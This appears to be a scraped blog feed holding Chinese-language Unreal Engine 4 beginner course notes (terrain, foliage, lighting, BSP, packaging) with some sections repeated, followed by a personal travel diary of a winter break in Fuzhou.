    ​世界大纲中选择想要的合并的静态网格体,窗口 - 开发者工具 - 合并Actor

    【基础】07-1 课:地形工具的使用

    创建地形

    ​模式下 管理,设置好参数,建立地形。

    雕刻 类似 Unity,制造坑坑洼洼。

    绘制 类似 Unity,给地形上材质。

    编辑样条

    编辑样条 在地形上创建样条线。

    编辑样条

    Ctrl + 左键 添加控制点。

    创建地形

    Landscape Spline 选择 分段 以选择所有样条线,Landscape Spline Meshes 中选择对应的网格体和材质覆盖创建一个类似马路的东东。

    【基础】07-2 课:灰度图生成地形

    ​从 height map - 搜索 图片 (bing.com) 整点灰度图,在 PS 中将其改成 16 位 且 颜色为 灰度pngraw 格式的图片。

    灰度图

    ​UE 中导入这个灰度图,调好参数,生成地形。

    创建地形

    【基础】07-3 课:植被工具的使用

    ​使用植被工具!将想在地形中放置的对象拖入植被工具中。

    植被工具

    ​植被中有些参数值得调整:

    • Mesh 中网格体双击,添加碰撞
      • 可以手动生成简单的碰撞(立方体,胶囊体)。
      • 凸包分解,给模型增加一个凸包碰撞体,调节参数在性能与精确度之间取得平衡。

    设置参数

    • Instance Settings
      • 设置 剔除距离,当摄像机里物体超过一定距离时,不渲染。
      • 碰撞预设

    【基础】08 课:光照渲染、自动曝光、雾

    • UE4 里有着这么几种光源:

      • 定向光源
      • 点光源
      • 聚光源
      • 矩形光源(性能开支较大,用的比较少,如显示器屏幕)
      • 天空光照
    • 这些光源的细节里有着这么个属性:

      • 静态

        静态对象不能在游戏中修改。

        • 允许烘培的光照
        • 最快的渲染速度
      • 固定

        静止对象可在游戏中修改但无法移动,启用缓存光照法。

        • 缓存动态阴影。
      • 可移动

        可移动对象能在游戏中进行移动和修改。

        • 完全动态
        • 投射动态阴影
        • 渲染速度最慢

    静态和固定移动性的区别:

    1. 渲染速度对比:静态渲染速度最快(性能开销最小)
    2. 参数修改:静态构建完修改参数,还需构建才会出效果且静态不能在游戏中修改参数
    3. 阴影:静态无法对可移动的模型产生阴影

    构建光照

    ​静态光照需要构建一波。

    ​设置中有个自动曝光可以调整。

    虚幻引擎中的自动曝光是一种功能,用于自动调整场景中的曝光水平,以确保画面亮度合适且细节丰富。在虚幻引擎中,自动曝光功能可以根据场景中的光照条件动态调整相机的曝光参数,使画面看起来更加自然和平衡。

    通过自动曝光功能,虚幻引擎可以根据场景中不同区域的光照强度和对比度来动态调整曝光值,以确保整个画面的亮度范围都能得到良好的展示。这有助于避免画面出现过曝(亮部细节丢失)或欠曝(暗部细节丢失)的情况,提高视觉效果和画面质量。

    总的来说,虚幻引擎中的自动曝光功能能够帮助开发者轻松地优化场景的曝光效果,使游戏画面看起来更加生动逼真。

    自动曝光

    ​指数级高度雾让场景在远处能有朦胧的效果。

    【基础】09 课:实现光束和体积雾

    光束

    ​教你制作室内光束的效果。

    ​平行光中细节 Light Shafts 调整 光束遮挡光束泛光

    ​指数级高度雾中细节 Volumetric 打开设置 体积雾,然后调整光源中 Light体积散射强度

    【基础】10 课:系统默认天空球使用

    天空球

    Ctrl + N 新建一个 Default 场景。

    天空球

    ​操作一下这个 Sky Sphere

    • 默认 下可以让这个天空球与平行光绑定
    • 然后就是操作颜色啊巴拉巴拉……

    【基础】11 课:获得角色控制权的两种方法

    ​把场景之前的小人给我删了。

    窗口 - 世界场景设置,修改 Game ModeThirdPersonGameMode,然后在某个地方创建玩家出生点。

    ​这个 Game Mode 也可以自己设计。

    设置出生点

    【基础】12 课:打包游戏、游戏模式、默认关卡

    项目设置

    ​设置里打开 项目设置,设置好 Default Modes (默认游戏模式)和 Default Maps (默认地图(关卡))。

    项目设置

    ​电脑应装有 Visual Studio 的相关库才可以打包项目!

    ]]>
    + 资源

    课程

    选看

    ###【选看】什么是虚幻引擎、适合什么人学、支持平台、经验分享

    这系列课程能带给你什么?

    • 能够了解虚幻 4

    • 了解虚幻 4 能够制作什么

    • 能够确认自己是否适合学习虚幻 4

    • 能够获得自我学习的途径

    • 能够熟悉基本的虚幻 4 的界面操作

    • 能够搭建简单的场景

    • 能够制作简单的互动(开关门、昼夜交替)

    • 能够使用地形工具绘制地形

    • 能够制作地形材质

    • 能够了解虚幻 4 渲染特性(灯光、后期、雾)

    • 能够制作简单的 UI 界面

    • 能够制作简单的过场动画

    • 了解虚幻 4 的一些基本概念

    什么是虚幻 4?

    • 虚幻 4

      是由 Epic Games 开发的一个游戏引擎,Epic Games 是一家美国视频游戏和软件开发公司。虚幻 1 是由 TimSweeney 开发的,他同时也是 EpicGames 的创始人。于 1998 年 5 月发行。虚幻 4 从企业应用和电影体验到高品质的 PC、主机、移动、VR 及 AR 游戏,虚幻 4 能够提供从启动项目到发行产品所需的一切。世界级的工具套件以及简易的工作流程能够帮助开发者快速迭代概念并立即查看成品效果,且无需触碰一行代码。而完整公开的源代码则能让虚幻引擎 4 社区的所有成员都能够自由修改和扩展引擎功能。

    • 行业前景

      越来越多的开发者,开发商投入到虚幻 4 中,简单的说就是使用虚幻 4 的人越来越多了,许多独立游戏,大厂的游戏都在使用虚幻 4 来开发,加上虚幻 4 对开发者来说使用完全免费,所有源代码都是开源的,你只需要在发行的时候支付 5% 的费用。

    虚幻 4 都有哪些功能?

    • 实时逼真渲染

      “开箱即用”的好莱坞级视觉效果。虚幻引擎基于物理的渲染技术、高级动态阴影选项、屏幕空间反射以及光照通道等强大功能将帮助您灵活而高效地制作出令人赞叹的内容。

    • 蓝图:创作,无需代码

      有了对于设计师更加友好的蓝图可视化脚本,您无需触碰一行代码,就能快速制作出原型并推出交互内容。您可以使用蓝图构建对象行为和交互、修改用户界面、调整输入控制以及许多其他操作。您还可以使用强大的内置调试器在测试作品的同时可视化玩法流程并检查属性。

    • 包含完整的 C++ 源代码

      通过完整的 C++ 源代码,您能够学习、自定义并调试整个虚幻引擎,并毫无阻碍地发行您的产品。

    • 稳健的多人框架

      历经 20 多年的发展,虚幻引擎的多人框架已通过众多平台以及不同游戏类型的考验,制作过众多业内顶尖的多人游戏体验。虚幻引擎推出的“开箱即用”型客户端/服务器端结构不但具有扩展性,而且久经考验,能够使任何项目的多人组件“立等可用”。

    • VFX 与粒子系统

      内置的 Niagara 和级联粒子视觉效果编辑器能让您采用大量不同类型的模块,完全自定义粒子系统利用粒子光照点亮您的场景,并使用向量场构建复杂的粒子运动模拟现实情境,并制作出专业级的完美成品。

    • 灵活的材质编辑器

      虚幻引擎 4 的材质编辑器采用基于物理 PBR 的着色技术,赋予您对于角色和物体外观和感觉的空前掌控力。使用以节点为基础的直观工作流程快速创建多种经得起近距离检验的表面。像素级别的图层材质和可微调的值能让你创作出任何想要的风格。

    • 电影级后期处理效果

      虚幻引擎的后期处理能够能让您优雅地调整场景的外观和感觉。动动指尖就能轻松获得电影级的效果,包括环境立方体贴图、环境遮挡、高级泛光、颜色分级、景深、人眼适应、镜头光晕、光束、临时采样抗锯齿和色调映射等众多实用功能。

    • 包罗万象的动画套件

      通过虚幻的网格体以及动画编辑工具,您能够完全自定义角色。工具中强大的功能包括了状态机、混合空间、逆向运动学和由动作驱动的物理特性。您可以使用动画蓝图高效工作,通过即时预览动作,制作出真正的动态角色以及真实可信的动作。

    • Sequencer:专业动画

      由影视行业专家设计的 Sequencer 是款完整的非线性、实时动画编辑工具,专为多人协同工作而生,能够释放您的创作潜能。它能让您以镜头为单位逐定义和修改光照、镜头遮挡、角色以及布景。使用动画运镜和实时游戏录制创作各种不同的动态剪辑。

    • 地形与植被使用地形系统

      创建巨大的、开放的世界环境。得益于地貌系统强劲的 LOD 系统和高效的内存使用,您可以创建比过去大出几个数量级的地形。使用 LandscapeGrass 功能用不同类型的花草自动覆盖庞大的户外环境,并使用植被工具快速地绘制摆放树木、灌木、岩石及其他装饰物。

    • 专为 VR、AR 及 MR (XR) 而生

      得益于 Epic 与全球顶尖的硬件及软件厂商间紧密的合作,虚幻引警能为虚拟现实 (VR)、增强现实 (AR) 及混合现实 (MR) 体验的创作者提供最高品质的解决方案。通过与最流行的各大平台实现本地集成,以及前向渲染、多采样抗锯齿 (MSAA) 以及实例化双目绘制以及单视场远景渲染等优化手段,UE4 能够在无损性能的前提下制作出高品质的成果。

    • 先进的人工智能

      通过虚幻引擎 4 的游戏框架及人工智能系统,可赋予 AI 控制角色对周围世界更好的空间意识,同时使他们能够更智能地行动。随着您不断移动对象,动态导航网格体会实时更新,以获得最佳路径。

    虚幻 4 适合什么人学?

    • 爱玩游戏的
      可能平时爱玩游戏,总想做一个自己的游戏,可以自己主导整个游戏剧情,玩法,以做游戏为业余爱好的朋友
    • Unity 转行的
      可能刚刚由于种种原因,转行做 UE4 的朋友
    • 有代码基础的
      可能之前学习过代码 (PHP、JAVA、C++),并对 UE4、做游戏有强烈热情的朋友
    • 大学期间有空闲时间的如果你还在迷茫,不知以后干嘛,可能学习虚幻 4 是一个不错的选择以兴趣爱好出发,总会有意想不到的收获!
    • 室内设计的(美术方向)虚幻 4 对于美术方面也是非常友好的,熟悉参数后就能调整到不错的画面,加上蓝图不需要任何代码,就可以实现一些简单的互动。
    • 更多…

    虚幻 4 支持的平台

    ​虚幻 4 还有很多插件,方便其他软件的用户使用,如 Vray,3dsmax,Speed tree,True sky。以及很多硬件厂商都有对应的 SDK 支持。

    虚幻 4 制作的游戏

    ​堡垒之夜、绝地求生、往日不在、方舟、SCUM、叛乱 2.沙漠风暴……

    分享自己的学习之路

    要点:

    1. 兴趣、热情
    2. 做一个自己想做的游戏
    3. 成就感
    4. 动力
    5. 能够独立解决问题
    6. 遇到问题能够快速的查阅相关资料
    7. 钻研精神

    你们可能会问的问题

    ​问:学习虚幻 4,一定要学 C++ 吗?

    ​答:肯定的,就程序这条路而言,从一个初级虚幻 4 工程师到中级甚至是高级工程师,C++ 熟练掌握是必须的,入门可以先从蓝图开始。

    ​问:学习虚幻 4 需要什么配置的电脑?

    ​答:首先最好使用英伟达的游戏系的显卡,虚幻 4 对配置要求还是蛮高的,如果预算有限,刚刚入门的朋友,就我经验而言,可以差不多买个五六千的组装机就可以了。

    ​CPU: i7-7700、显卡: GTX1060、内存: 8g、固态 128g(这是我能接受的最低配置,上不封顶)

    ​问:我没有代码基础基础或者转行过来的,容易学吗?好上手吗?

    ​答:虚幻 4 上手入门不难,学精就难了,所以一开始可以抱着玩游戏的心态(也就是兴趣,不是随便玩一玩的意思)。况且虚幻 4 有蓝图(不需要写任何代码),无论你是学习程序,还是美术,都可以在一开始实现一些简单的功能,做一些简单的游戏,增加你的成就感!

    ​问:学习虚幻 4 是否要学报英语培训课?(是否要学英文)

    ​答:不一定,但是能够同时进行是最好的,毕竟虚幻 4 很多功能选项还是英文的,不过随着版本的不断更新,汉化的力度越来越强大,我现在学习有时候都是用英文版本的,再开一个中文版本的作为翻译。

    ###【选看】学习虚幻引擎的 15 个途径

    ###【选看】虚幻引擎版本选择

    ​4.24

    ###【选看】虚幻引擎全流程安装

    1. 注册和登录 EpicGames 账号
    2. 下载和安装 Epicgames 启动器
    3. 使用和介绍 EpicGames 启动器
    4. 安装虚幻引擎

    ###【选看】新版本下载流程、更改缓存路径

    更改缓存路径

    ​ 将 安装盘:\Program Files\Epic Games\UE_4.24\Engine\Config\BaseEngine.ini

    1
    DeleteUnused=true, UnusedFileAge=34, FoldersToClean=-1, Path="%ENGINEVERSIONAGNOSTICUSERDIR%DerivedDataCache", EditorOverrideSetting=LocalDerivedDataCache)

    中的 Path="%ENGINEVERSIONAGNOSTICUSERDIR%DerivedDataCache"改为:Path="%GAMEDIR%DerivedDataCache"

    ​如此做,项目的缓存路径就会在项目的根目录创建,以减少 C 盘占用空间。

    ###【选看】虚幻 4 闪退原因汇总

    ###【选看】虚幻 4 免费素材渠道汇总

    • 虚幻商城

    虚幻商城

    基础

    ###【基础】01 课:创建项目全流程和模板试玩

    ​打开 Unreal4.22,创建项目:

    创建项目

    创建项目


    虚幻 4 工程文件夹的结构:

    • Config:包含了项目设置,键盘输入之类的配置文件
    • Content:存放引擎或游戏的内容,包括地图、贴图、模型、材质、蓝图等
    • Intermediate:包含了在编译引擎或游戏时生成的临时文件
    • Saved:包含了自动保存内容,配置 (*.ini) 文件以及日志文件
    • uproject:项目启动程序,开启我们的项目

    【基础】02-1 课:超详细编辑界面介绍

    ​介绍虚幻 4 的界面,跟 Unity 的差不多,有些没接触过的:

    ​视图界面:

    视图界面

    ​书签可以保存 / 读取特定的视口。

    视图界面

    ​视图模式显示某些内容或是辅助信息。

    【基础】02-2 课:视口导航(在视口界面移动视角)

    ​不同于其他三维应用程序(聚焦和围绕一个正在构建的资源),虚拟引擎视口移动功能按键专门用于对大型游戏关卡进行布景,其中快速穿越大范围区域的功能非常关键。

    功能按钮操作
    左键单击 + 拖动前后移动视口摄像机和左右旋转视口摄像机。
    右键单击 + 拖动旋转视口摄像机,不前后移动。
    左单击 + 右单击 + 拖动 / 滚轮单击 + 拖动在世界场景中上下移动视口摄像机。
    Ctrl + Alt + 单击 + 拖动创建方形选取框。
    按住鼠标右键 + WASD 键像在典型的第一人称射击游戏中那样导航关卡。
    F 键将视口摄像机聚焦到视口中选中的 Actor 上。
    AIt + 鼠标左键 + 拖动围绕单个的支点或兴趣点翻转视口。
    Alt + 鼠标右键 + 拖动向前推动摄像机使其接近或远离单个支点或兴趣点。
    Alt + 中键单击 + 拖动根据鼠标移动的方向将摄像机向左、右、上、下移动。

    【基础】03 课:物体编辑(坐标系、变换、单位)

    变换

    ​选中对象,R 移动,W 旋转,E 缩放。

    ​设置局部坐标系 / 全局坐标系。

    全局 / 局部

    单位和度量

    • 默认情况下,1 个虚幻单位(uu)等于现实世界的 1 厘米(cm)。这是一个要注意的重要细节,你应将其应用于设计和游戏的所有方面,以开发出相应的环境、角色、效果等。
    • 默认情况下,玩家通常在游戏世界场景中高约 6 英尺:相当于 180 厘米,或 180 uu。为了满足项目的需要,你可以更改此默认值。但无论默认值是什么,你都可以将其用作基值来为所有其他 Actor 的大小建立情境。

    枢轴偏移

    • 中键 选中物体中心再拖动,右键可以设置该对象的中心(枢轴偏移):

    设置枢轴偏移

    框选

    • Ctrl + Alt + 左键 可以进行框选。

    复制

    • 选中对象,Alt + 左键 可以复制对象。

    【基础】04 课:导入资源、项目迁移和管理

    一些最常用的文件类型和资源类型以及相关的应用程序

    资源类型文件扩展名应用程序
    三维模型、骨架网格体结构、动画数据.fbx、.objMaya、3ds Max、ZBrush
    纹理和图片.bmp、.jpg、.pcx、.png、.psd、.tga、hdrPhotoshop
    字体.otf、 . ttfBitFontMaker2
    音频.wavAudacity、 Audition
    视频和多媒体.wmvAfter Effects、Media Encoder
    PhysX(物理类).apb、.apxAPEX PhysX Lab
    其它.csvExcel

    ​许多资源不是导入的,而是直接在编辑器中创建的。
    ​常见示例:

    • 蓝图类
    • 粒子系统
    • 材质和材质实例

    ​选择某个资源,打开引用查看器可以查看这个资源与哪些其它资源绑定。

    引用查看器

    ​导入 / 导出资源最好使用虚幻引擎的迁移功能,使用复制粘贴有可能导致一些兼容性问题。

    迁移

    【基础】05-1 课:主流三维软件模型导入虚幻 4

    ​对于一些主流的三维建模软件(3ds max、C4D),可以使用 Datasmith 插件将模型导入到虚幻引擎中。

    ​对于 Maya,有 Maya Live Link 这个插件。

    Maya Live Link

    fbx 格式和 obj 格式的共同点:
    它们都是三维通用模型格式,都支持三个点以上的面,都可以用在目前几乎所有主流的三维软件中。
    fbx 格式和 obj 格式的大致区别:
    fbx 中包含动画、材质特性、贴图、骨骼动画、灯光、摄像机等信息0B]中不包含动画、材质特性、贴图路径、动力学、粒子等信息。
    abc 格式:
    中文名称:蒸馏机 支持动画、粒子等!bake 三维场景的模型、流体、动画、特效等数据。

    传统文件格式的导入:

    导入 fbx

    ​emmm 感觉一个比较有用的是 合并网格体,其它随意。

    戴珍珠耳环的少女

    ​试了下导入之前建的模型,眼睛应该是建模的时候没设好材质……其它 OK。

    【基础】05-2 课:Datasmith 插件使用全流程

    ​给 3ds Max、C4D 安装这个插件,这样导出文件的时候就会多一个 Datasmith 文件格式的选项,这样一些材质参数就能够被虚幻引擎所识别。

    4.24 的 datasmith 插件是内置到虚幻引擎中了
    但是 4.24 以下的版本并没有
    需要在虚幻商城中搜索 datasmith
    然后选择 unreal datasmith 插件安装到对应的版本中即可~

    【基础】06-1 课:BSP 画刷的概述和使用方法

    什么是 BSP(画刷)?

    1. BSP (Binary Space Partitioning(二进制空间分区))
      在虚幻引擎 4 中有很多不同的方法可以创建、编辑场景中的几何体。通常意义下,相对于直接创建几何体而言,使用静态网格体是比较好的做法(性能上较优秀)。同时,由于静态网格体要求在引擎外部的 3D 建模软件中创建,因此可以使用引擎的几何体编辑工具快速的为游戏原型来搭建场景。

      所以就有了 BSP(画刷)工具,能够帮助你们在虚幻引擎快速的搭建一些基本的模型!

    2. 另外一个解读
      BSP 画刷是虚幻的关卡构建中最为基本的工具。从理论上说,最好将 BSP 想象为可以在关卡中进行填充并切除空间体积的东西。很久之前,BSP 被用来作为关卡设计中的主要构建模块。但是现在,这个角色由静态网格物体来承担,相较而言,静态网格物体远为高效,不过,作为关卡和物体的快速原型化产品的前期应用:以及对于那些无法使用 3D 建模工具而需要进行关卡构建的人来说,BSP 依然很有用。

    ​就是用虚幻引擎实现一些简单的建模功能。

    BSP 画刷的用途

    1. 粗略画出关卡

      开发关卡的标准工作流程是这样的:

      • 设计出关卡草图及关卡路径。
      • 运行关卡测试流程和游戏性。
      • 修改布局并反复测试。
      • 起始的网格物体环节。
      • 起始的光照环节。
      • 对碰撞及性能问题的游戏测试。
      • 润色。
    2. 简单过滤器几何体

      通常,在关卡设计师制作他们的关卡过程中,他们会突然想出一个情形,其中他们需要一个非常简单的一块几何体来填充空隙或空问。如果没有静态网格物体填充空间,不需要麻烦美术组负责创建一个自定义网格物体,设计师只需使用 BSP 就可以填充这个空问。尽管静态网格物体在性能方面更好,但是只要几何体简单,就可在不造成任何严重影响的情况下可以偶尔使用 BSP。

    BSP 画刷工具的使用

    BSP 模式

    ​感觉要比 Unity 里的要更高级一点……

    选择多个面

    ​细节面板里可以选择多个面,把材质拖上去以应用材质。

    【基础】06-2 课:房子搭建全流程

    ​内容浏览器下新建一个关卡,一片漆黑……往场景添加:定向光源、天空光照、天空大气、体积云、指数级高度雾。

    新建关卡

    ​内容浏览器下 添加功能或内容包…,导入 第三人称游戏 素材包。

    导入人物

    内容/ThirdPersonBP/Blueprints/ThirdPersonCharacter.uasset 拖入场景, 细节中搜索 poss,将 Pawn 下的 自动控制玩家 设为 玩家0,此时运行关卡就会以第三人称小人的形式。

    设置玩家控制权

    创建立方体

    ​使用 BSP 创建立方体作房屋主体,注意是在几何体里而不是基础里。

    Brush Settings 设置好对应的 XYZ(而不是缩放,这会导致材质问题)。

    ​设置好 中空墙壁厚度

    中空的门

    ​设置一个 Subtractive 类型的立方体作门,如果把地面也挖了,在地面的 Brush Settings 设置好排序。

    楼梯

    ​挖楼梯。

    内饰

    ​从 内容/StarterContent/ 里选取对应的素材,一阵操作。

    内饰

    ​玻璃房里可以添加 球体反射采集,增加真实性。

    打包

    ​将所有的 BSP 画出来的东西打包成一个静态网络体。

    【基础】06-3 课:静态网格模型碰撞设置

    设置碰撞体

    ​双击某个静态网络体,可以设置碰撞器(类似 Untiy 的 Mesh Colider?)

    设置碰撞体

    ​这个椅子可以从细节面板的 静态网络体 里设置碰撞。

    设置碰撞体

    ​此法设置碰撞体类似于 Unity 里的 Box Colider。

    【基础】06-4 课:合并 Actor(合并静态网格体)

    合并静态网络体

    ​世界大纲中选择想要的合并的静态网格体,窗口 - 开发者工具 - 合并Actor

    【基础】07-1 课:地形工具的使用

    创建地形

    ​模式下 管理,设置好参数,建立地形。

    雕刻 类似 Unity,制造坑坑洼洼。

    绘制 类似 Unity,给地形上材质。

    编辑样条

    编辑样条 在地形上创建样条线。

    编辑样条

    Ctrl + 左键 添加控制点。

    创建地形

    Landscape Spline 选择 分段 以选择所有样条线,Landscape Spline Meshes 中选择对应的网格体和材质覆盖创建一个类似马路的东东。

    【基础】07-2 课:灰度图生成地形

    ​从 height map - 搜索 图片 (bing.com) 整点灰度图,在 PS 中将其改成 16 位 且 颜色为 灰度pngraw 格式的图片。

    灰度图

    ​UE 中导入这个灰度图,调好参数,生成地形。

    创建地形

    【基础】07-3 课:植被工具的使用

    ​使用植被工具!将想在地形中放置的对象拖入植被工具中。

    植被工具

    ​植被中有些参数值得调整:

    • Mesh 中网格体双击,添加碰撞
      • 可以手动生成简单的碰撞(立方体,胶囊体)。
      • 凸包分解,给模型增加一个凸包碰撞体,调节参数在性能与精确度之间取得平衡。

    设置参数

    • Instance Settings
      • 设置 剔除距离,当摄像机里物体超过一定距离时,不渲染。
      • 碰撞预设

    【基础】08 课:光照渲染、自动曝光、雾

    • UE4 里有着这么几种光源:

      • 定向光源
      • 点光源
      • 聚光源
      • 矩形光源(性能开支较大,用的比较少,如显示器屏幕)
      • 天空光照
    • 这些光源的细节里有着这么个属性:

      • 静态

        静态对象不能在游戏中修改。

        • 允许烘培的光照
        • 最快的渲染速度
      • 固定

        静止对象可在游戏中修改但无法移动,启用缓存光照法。

        • 缓存动态阴影。
      • 可移动

        可移动对象能在游戏中进行移动和修改。

        • 完全动态
        • 投射动态阴影
        • 渲染速度最慢

    静态和固定移动性的区别:

    1. 渲染速度对比:静态渲染速度最快(性能开销最小)
    2. 参数修改:静态构建完修改参数,还需构建才会出效果且静态不能在游戏中修改参数
    3. 阴影:静态无法对可移动的模型产生阴影

    构建光照

    ​静态光照需要构建一波。

    ​设置中有个自动曝光可以调整。

    虚幻引擎中的自动曝光是一种功能,用于自动调整场景中的曝光水平,以确保画面亮度合适且细节丰富。在虚幻引擎中,自动曝光功能可以根据场景中的光照条件动态调整相机的曝光参数,使画面看起来更加自然和平衡。

    通过自动曝光功能,虚幻引擎可以根据场景中不同区域的光照强度和对比度来动态调整曝光值,以确保整个画面的亮度范围都能得到良好的展示。这有助于避免画面出现过曝(亮部细节丢失)或欠曝(暗部细节丢失)的情况,提高视觉效果和画面质量。

    总的来说,虚幻引擎中的自动曝光功能能够帮助开发者轻松地优化场景的曝光效果,使游戏画面看起来更加生动逼真。

    自动曝光

    ​指数级高度雾让场景在远处能有朦胧的效果。

    【基础】09 课:实现光束和体积雾

    光束

    ​教你制作室内光束的效果。

    ​平行光中细节 Light Shafts 调整 光束遮挡光束泛光

    ​指数级高度雾中细节 Volumetric 打开设置 体积雾,然后调整光源中 Light体积散射强度

    【基础】10 课:系统默认天空球使用

    天空球

    Ctrl + N 新建一个 Default 场景。

    天空球

    ​操作一下这个 Sky Sphere

    • 默认 下可以让这个天空球与平行光绑定
    • 然后就是操作颜色啊巴拉巴拉……

    【基础】11 课:获得角色控制权的两种方法

    ​把场景之前的小人给我删了。

    窗口 - 世界场景设置,修改 Game ModeThirdPersonGameMode,然后在某个地方创建玩家出生点。

    ​这个 Game Mode 也可以自己设计。

    设置出生点

    【基础】12 课:打包游戏、游戏模式、默认关卡

    项目设置

    ​设置里打开 项目设置,设置好 Default Modes (默认游戏模式)和 Default Maps (默认地图(关卡))。

    项目设置

    ​电脑应装有 Visual Studio 的相关库才可以打包项目!

    ]]>
    @@ -3140,7 +3140,7 @@ /posts/Diary-%E5%AF%92%E5%81%87%EF%BC%88%E7%A6%8F%E5%B7%9E%E7%AF%87%EF%BC%89/ - .article-container {overflow-x: unset;}

    前言

    • 这篇博客是记录 1.21 - 2.21 在福州躺平的生活🫣!
    • 整了一个很牛逼的东东——turn.js🤤!

    正文

    寒假开始锣😍!

    ​ 寒假头几天福州疯狂降温😶‍🌫️!

    日出金山

    ​ 偷一张小小怪在师大拍的日出金山,福州难得下了雪!虽然市区 p 也没有😇。

    1.25 乌山

    寻梦闽都

    ​ 花花绿绿的寻梦闽都,把通向黎明湖的隧道霸占了😠!

    1.26 温泉公园

    晋安河

    ​ 家门口通了很方便的 4 号线😍!这样可以每天坐地铁去环境最好的省图了!

    ​ 印象中很久没有去省图旁边的温泉公园了。

    1.30 晋安湖

    晋安湖

    ​ 晋安湖公园几乎已经修缮完成。

    ​ 福州的晴天,天空真的很蓝😍。

    晋安之眼

    ​ 看着很漂亮,却不能坐的晋安之眼😅。

    2.1 福建师范大学

    师大美院旧址

    ​ 父母曾经读书的地方🤔,漂亮的小洋楼。

    雕塑

    ​ 教学楼前的雕塑。

    苏式建筑

    ​ bb 说是苏式建筑。

    2.3 三坊七巷

    南后街

    ​ 之前的暑假都懒得去的地方,这个寒假不知道去了多少次🤪,每天都人气火爆。

    2.6 烟台山

    仓山影剧院

    ​ 偷跑去烟台山公园玩。

    石厝教堂

    ​ 网红地标——石厝教堂!不过我觉得这个教堂并不是很好看,矮矮扁扁的🤔。

    福州时代中学

    ​ 时代中学最后一届学生的最后一个学期就要到了,这会不会是我最后一次见到这个招牌呢?

    2.7 南公园

    南公园
    南公园 南公园 南公园

    ​ 打着去大利嘉城整散热硅胶的幌子去南公园玩🫢。

    除夕-春节 青年广场

    青年广场

    ​ 中洲岛又要放烟花了!今年索性连春晚都没看了。

    ​ 青年广场布满了围挡差评☹️!估计是政府怕发生踩踏事故,结果造成了很大的不便。

    无人机

    ​ 风里雨里终于等到了零点!无人机启动!

    福

    ​ 2024——福州年,最有福。

    🍺

    ​ 干杯!

    ❤

    ​ 我爱虎纠!

    🐉

    ​ 龙年大吉!

    还挺厉害的

    ​ 去年福州拿了一个看上去很牛逼其实没啥卵用的奖项——全球可持续发展城市🥱。

    大疯狂

    ​ 最后一阵乱喷。

    ​ 为了保证网页浏览速度,只能压缩出这么一小段烟花。

    2.11 旗山湖

    旗山湖

    ​ 偷跑去晋安湖的好朋友——旗山湖!

    2.12 梁厝

    ​ 看小红书说梁厝是个不错的地方,还可以地铁直达,去闯闯😍。

    艺术中心

    ​ 梁厝旁边有点掉色的艺术中心。

    梁厝

    ​ 在外面呆久了,才能注意到这种建筑真的很有福州特色。

    🐘

    ​ 梁厝里最大的厝!前面有个大围挡差评!

    可爱小蜜蜂

    ​ 南方春来早。采蜜的蜜蜂。

    游神 游神 游神

    ​ 今年福州拿出了游神我这个假福州人从来没有听说过的东西🤧,看得出福州也在很努力地宣传旅游资源。

    古与今

    ​ 古今同框,这个“古”挺新,这个“今”反倒有点旧🥸。

    这个地方真是太好玩了!

    ​ 返程途中又去了著名景点三坊七巷😇,人居多。

    ​ 这段时间可以看到很多外地的车牌,浙 B 的尤其多。

    2.14 金鸡山公园

    金鸡山公园

    ​ 从图书馆出来走彩虹桥结果给我直接送山顶去了🤧。

    2.15 福州市博物馆

    律师函⚠

    ​ 理着中分头的市博。

    古吴神韵

    ​ 吴越地区是中华文明的重要起源地之一,是中国东部长江下游的古代文明中心。吴越文化与长江中游的楚文化和长江上游的巴蜀文化并称为长江流域古代三大文明。吴是周人和江南土著民族结合而形成的诸侯国,商晚周初在太伯、仲雍创建勾吴时一方面“端委,以治周礼”;另一方面又随乡入俗,“断发文身”。所以吴国文化是由华夏文化和土著“荆蛮人”文化相融合形成的区域性文化,始终保持着鲜明的地方特征。
    本展览撷取镇江博物馆藏吴文化青铜精品 56 件(套),从一个侧面揭示吴文化的区域特征,相信会给大家带来别样的感受。

    市博 市博 市博

    ​ 先是跟福州毫不搭嘎的展览——镇江青铜文物展!

    镂云裁月 妙笔神针——吉林地区满族绣品展

    ​ 满族刺绣作为满族民族文化的重要载体,以针代笔,以线代盟,是满族先民审美与智慧的结晶也是满汉文化相互交融的历史见证。
    ​ 吉林是满族聚居地之一,清代曾在这里设立打牲鸟拉总管衙门,负贵为皇室采捕贡品。吉林满族绣品,具有强烈的民族及地域特色,造型夸张粗犷,色彩凝重艳丽,冷暖对比强烈,构图饱满对称绣工精美绝伦。其作品主要有枕头顶、荷包、幔帘、幔帐、围裙等。题材内容,既有生产生活因素,又有文化传承关系,尤其是萨满文化主题。
    ​ 本次展出的作品,多来自打牲乌拉总管衙门辖地的伊通和九台地区,时代跨度从清代到民国,以代表满族民间刺绣精华的“枕头顶绣"和“幔帐套绣”为主,堪称传统艺术瑰宝。

    市博 市博 市博

    ​ 然后是跟福州毫不搭嘎的展览——吉林满族刺绣展!

    市博

    ​ 福州古地图,根本认不出来😅。

    市博 市博 市博

    ​ 然后是跟福州搭嘎的展览——“碗礁一号”沉船出水瓷器展!只是江西的瓷器到福州出海的时候沉船了,就算是福州的了🤔。

    市博 市博 市博

    ​ 然后是跟福州非常搭嘎的展览——闽都华章!陶陶罐罐,佛像泥人。

    青铜器

    ​ 商代的福州居然能出现这么牛逼的青铜器?!

    2.16 台江

    文化宫

    ​ 寒假就快结束了!想走之前再约个球,去文化宫踩点。好消息是这段时间文化宫球场免费,坏消息是因为球场免费导致占不到场地😇。

    上下杭

    ​ 人挤人的上下杭,拥挤状况就比三坊七巷好一丢丢。

    老房子

    ​ 还有一点租界的痕迹。

    long 华富贵

    ​ 福建特产——龙华富贵!

    WAIYA

    ​ 只要几个福字就能成为非常网红的小街。

    ❤

    ​ 打卡网红大字。

    厝与教堂

    ​ 中外同框。

    茉莉大街

    ​ 没有一朵茉莉花的大街。

    万寿桥

    ​ 框框里的解放大桥。

    口号

    ​ 普通话不标准,让故乡更亲近😇!

    2.17 康桥里

    ​ 超人大炮从湖南回来了,或许是最后一次在福州见到他?这也将是我离开福州前的最后一个周末了,跟大炮哥和保罗约个球,那早上就跟保罗看了个《飞驰人生 2》,我觉得还不错,保罗说一般般🧐。

    康桥里

    ​ 看电影前在电影院外的投篮机打发时间,被保罗吊打😵。

    炒菜

    ​ 体验一下保罗的工作餐。

    花灯

    ​ 打完球吃完饭随便走了走金鸡山公园。

    瀑布

    ​ 金鸡山公园的瀑布好久没见到了,保罗说一直都有瀑布的🫣。

    2.18 省图

    省图

    ​ 要走之前再记录下省图吧!

    中国梦

